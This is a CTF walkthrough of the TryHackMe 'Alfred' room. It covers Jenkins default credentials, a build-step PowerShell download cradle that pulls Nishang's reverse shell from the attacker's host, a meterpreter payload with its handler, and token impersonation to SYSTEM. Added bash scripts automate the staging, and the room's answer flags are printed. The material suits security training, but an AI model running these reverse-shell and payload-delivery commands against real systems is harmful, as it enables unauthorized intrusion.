THM Alfred - grunt92/IT-Sec-WriteUps GitHub Wiki

Initial Access

How many ports are open? (TCP only)

Run nmap -A -p- IP to scan all 65535 TCP ports (-A adds version detection, default scripts, OS detection and a traceroute; the full port range takes a while, so a plain -p- sweep first and -A only on the ports it finds is faster). The three open TCP ports are 80, 3389 and 8080, the last one being Jenkins.

3

What is the username and password for the login panel (in the format username:password)

Jenkins listens on port 8080. Try the default and most common credential pairs by hand first; if that fails, a brute-forcer (for example Hydra against the login form) with a list of common username:password combinations finds it quickly.

admin:admin

You first need to download the PowerShell reverse-shell script the room links to (Nishang's Invoke-PowerShellTcp.ps1) and make it available for the server to download. The simplest way is a web server started from the directory that holds the script: python3 -m http.server (serves the current directory on port 8000).

Log in and click New Item. Copy the template from the existing job "project" (or just edit "project" itself). Go to the Build tab, add an "Execute Windows batch command" step and enter the command provided by THM, after substituting your IP address and port. Save the job and build it once the web server and a listener (nc -lvnp PORT) are running on your machine. The build step runs as the account the Jenkins service uses, so anyone who can configure a job has command execution on the build host; that is the whole attack.

No answer needed
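The attacker side of the steps above, as an added example that is not part of the original writeup. It assumes Nishang's Invoke-PowerShellTcp.ps1 (the script the room links to) is in the working directory, that python3 and nc are installed, and that the target can reach your machine on port 8000 and on the listener port; LHOST and LPORT are placeholders you supply. The build-step string it prints is the same download-cradle form the room uses.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): attacker-side helper for the
# Jenkins build-step reverse shell. Assumes Nishang's Invoke-PowerShellTcp.ps1
# is in the current directory and that python3 and nc are installed.
set -eu

HTTP_PORT=8000   # port used by `python3 -m http.server` (assumption)

# True if $1 is a TCP port number in 1..65535.
is_port() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The one-liner to paste into the job's "Execute Windows batch command" step.
# cmd.exe starts powershell.exe, which fetches the script over HTTP, runs it
# from memory with iex, then calls the function it defines to connect back.
jenkins_build_step() {
    local lhost=$1 lport=$2 script=$3
    printf "powershell iex (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');Invoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n" \
        "$lhost" "$HTTP_PORT" "$script" "$lhost" "$lport"
}

# Serve the script, print the build-step command, then wait for the callback.
# The build runs as the Jenkins service account, so the shell arrives as that user.
stage_and_listen() {
    local lhost=$1 lport=$2 script=${3:-Invoke-PowerShellTcp.ps1}
    [ -f "$script" ] || { echo "missing $script in $(pwd)" >&2; return 1; }
    is_port "$lport" || { echo "bad port: $lport" >&2; return 1; }
    python3 -m http.server "$HTTP_PORT" --bind "$lhost" >/dev/null 2>&1 &
    local http_pid=$!
    trap 'kill "$http_pid" 2>/dev/null' EXIT
    echo "[*] serving $script on http://$lhost:$HTTP_PORT/"
    echo "[*] build step command:"
    jenkins_build_step "$lhost" "$lport" "$script"
    echo "[*] waiting for the shell on port $lport (save the job, then Build Now)"
    nc -lvnp "$lport"
}

# Usage: ./stage.sh run LHOST LPORT [script]    e.g. ./stage.sh run 10.9.0.1 4444
if [ "${1:-}" = run ]; then
    stage_and_listen "$2" "$3" "${4:-}"
fi
```

Without the `run` argument the script only defines the functions, so it can be sourced and jenkins_build_step called on its own to regenerate the command for a different port.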

What is the user.txt flag?

Run cat /Users/bruce/Desktop/user.txt (or cat C:\Users\bruce\Desktop\user.txt; the reverse shell is a PowerShell prompt, where cat is an alias of Get-Content) to get the flag.

79007a09481963edf2e1321abd9ae2a0

Switching Shells

What is the final size of the exe payload that you generated?

The meterpreter executable is built with msfvenom and caught with exploit/multi/handler; the number asked for is the one msfvenom prints on its "Final size of exe file: ... bytes" line.

73802
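How the exe payload and its handler are produced, as an added example that is not part of the original writeup. It assumes msfvenom and msfconsole are installed on the attacking machine, that the python3 web server from the Jenkins step is still serving the working directory on port 8000, and that the handler port differs from the one the nc shell occupies; LHOST and LPORT are placeholders. payload_size reproduces the number msfvenom reports as "Final size of exe file" from the file on disk.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): generate the meterpreter exe,
# report its size, print the target-side download commands and start a handler.
# Assumes msfvenom/msfconsole are installed and the payload is served over HTTP.
set -eu

PAYLOAD=windows/meterpreter/reverse_tcp   # staged x86 payload used in the room
HTTP_PORT=8000                            # python3 -m http.server port (assumption)

# Build the exe. shikata_ga_nai is a polymorphic encoder, not AV evasion; it is
# used here because the room asks for it, and it is what determines the final size.
gen_payload() {
    local lhost=$1 lport=$2 out=${3:-shell.exe}
    msfvenom -p "$PAYLOAD" -a x86 --encoder x86/shikata_ga_nai \
        LHOST="$lhost" LPORT="$lport" -f exe -o "$out"
}

# Size in bytes of a file; matches msfvenom's "Final size of exe file" line.
payload_size() {
    wc -c < "$1" | tr -d ' '
}

# Commands to run inside the existing PowerShell reverse shell on the target:
# download the exe into the shell's working directory and start it.
target_commands() {
    local lhost=$1 out=${2:-shell.exe}
    printf "powershell \"(New-Object System.Net.WebClient).Downloadfile('http://%s:%s/%s','%s')\"\n" \
        "$lhost" "$HTTP_PORT" "$out" "$out"
    printf 'Start-Process "%s"\n' "$out"
}

# Start a backgrounded multi/handler matching the payload. `exploit -j` keeps the
# console usable; `sessions -i 1` attaches once shell.exe connects back.
start_handler() {
    local lhost=$1 lport=$2
    msfconsole -q -x "use exploit/multi/handler; set PAYLOAD $PAYLOAD; set LHOST $lhost; set LPORT $lport; exploit -j"
}

# Usage: ./payload.sh run LHOST LPORT
if [ "${1:-}" = run ]; then
    gen_payload "$2" "$3" shell.exe
    echo "[*] final size: $(payload_size shell.exe) bytes"
    echo "[*] run on the target:"
    target_commands "$2" shell.exe
    start_handler "$2" "$3"
fi
```

The payload, architecture and LHOST/LPORT given to the handler must match what msfvenom was given, otherwise the staged connection completes but no session appears.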

Privilege Escalation

View all the privileges using whoami /priv

No answer needed
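A small triage of the whoami /priv output, as an added example that is not code from the original writeup. The sample output is constructed here and shortened to a few representative lines, and the list of privileges it flags goes a little beyond the two this box exposes; it assumes the standard three-column layout with the State in the last column.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): pick the enabled privileges out of
# `whoami /priv` output and flag the ones that commonly lead to SYSTEM.
# Assumes the standard layout: privilege name first, State (Enabled/Disabled) last.
set -eu

# Constructed sample, trimmed to a few lines of what the box prints.
SAMPLE='PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeShutdownPrivilege             Shut down the system                      Disabled'

# name:what it buys you. SeImpersonate and SeDebug are the two used on this box.
ABUSABLE='SeImpersonatePrivilege:impersonate a SYSTEM token (incognito, potato family)
SeAssignPrimaryTokenPrivilege:give a new process a SYSTEM primary token (potato family)
SeDebugPrivilege:open and inject into SYSTEM processes (meterpreter migrate)
SeBackupPrivilege:read any file regardless of ACL, e.g. the SAM and SYSTEM hives
SeRestorePrivilege:write any file regardless of ACL, e.g. swap a service binary
SeTakeOwnershipPrivilege:take ownership of protected files and registry keys
SeLoadDriverPrivilege:load a driver, including a known-vulnerable signed one'

# Names of privileges whose State column is Enabled. Stripping CR matters when the
# output was pasted from a Windows console, where every line ends in \r\n.
enabled_privs() {
    tr -d '\r' | awk '$1 ~ /^Se/ && $NF == "Enabled" { print $1 }'
}

# Enabled privileges that appear in ABUSABLE, one per line with the reason.
abusable_enabled() {
    enabled_privs | while read -r priv; do
        reason=$(printf '%s\n' "$ABUSABLE" | awk -F: -v p="$priv" '$1 == p { print $2 }')
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$priv" "$reason"
        fi
    done
}

# Usage: ./privs.sh saved_whoami_priv.txt   (no argument: run on the sample)
if [ $# -gt 0 ]; then
    abusable_enabled < "$1"
else
    printf '%s\n' "$SAMPLE" | abusable_enabled
fi
```

On the sample this prints the SeDebugPrivilege and SeImpersonatePrivilege lines only; SeChangeNotifyPrivilege and SeCreateGlobalPrivilege are enabled for almost every account and buy nothing.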

You can see that two privileges that matter here, SeDebugPrivilege and SeImpersonatePrivilege, are enabled. Neither is a vulnerability in itself; they are rights granted to the account Jenkins runs as, and we abuse them. SeImpersonatePrivilege lets the process impersonate any token it can get hold of, which is exactly what the incognito extension does. Enter load incognito to load the incognito module into the meterpreter session. Please note, you may need to use the use incognito command if the previous command doesn't work (older Metasploit versions). Also ensure that your Metasploit is up to date.

No answer needed

To check which tokens are available, enter list_tokens -g. The BUILTIN\Administrators token is listed as available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate it; if the console rejects the argument, double the backslash ("BUILTIN\\Administrators"), because the meterpreter console treats a single backslash as an escape character. What is the output when you run the getuid command?

NT AUTHORITY\SYSTEM

Even though you now hold a higher-privileged token, you may still not be able to act as that user. Windows uses the primary token of the process to decide what the process can do; impersonate_token only attaches an impersonation token to the meterpreter thread, so anything that consults the primary token (including processes you spawn from the session) still runs as the original Jenkins account. Migrate into a process whose primary token already belongs to the user from the answer above, NT AUTHORITY\SYSTEM. The safest choice is services.exe, a stable, long-lived SYSTEM process, and the SeDebugPrivilege seen earlier is what lets the session open it. First use the ps command to view processes and find the PID of services.exe, then migrate to it with migrate PID-OF-PROCESS.

No answer needed

read the root.txt file at C:\Windows\System32\config

Run cat \\Windows\\System32\\config\\root.txt to get the flag. The backslashes are doubled because the meterpreter console treats a single backslash as an escape character (cat C:\\Windows\\System32\\config\\root.txt works as well). The directory holds the registry hives and is readable only by administrators and SYSTEM, which is why the migration into services.exe has to happen first.

dff0f748678f280250f25a45b8046b4a